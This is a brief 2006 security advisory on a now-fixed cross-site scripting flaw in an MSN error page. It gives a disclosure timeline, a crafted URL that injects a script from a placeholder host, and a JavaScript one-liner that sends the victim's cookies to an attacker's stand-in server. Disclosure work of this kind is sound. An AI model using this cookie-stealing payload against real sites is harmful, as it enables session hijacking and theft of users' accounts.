Summary
A cookie-stealing Cross-site scripting vulnerability was found on MSN's
website (msn.com). Using this vulnerability, an attacker could potentially
gain access to a victim's Inbox.
This vulnerability was discovered by: tontonq and Nir Goldshlager.
Disclosure timeline
SecuriTeam was asked to assist the researchers with contacting Microsoft.
Reported to vendor: 18th of July, 2006.
Vendor response: 18th of July, 2006.
Resolved: 19th of July, 2006.
Public disclosure: 25th of July, 2006.
Technical description
A cookie-stealing XSS issue was discovered on MSN's web site.
Example of the issue:
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js
That error page gets the CB variable into a script tag.
If John Doe wanted to steal a victim's cookie, he could use this example Javascript
code:
i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;
As such, if for example, s.php stores the cookie variable somewhere, the
attacker can set that stored cookie and "jump" to the Inbox.
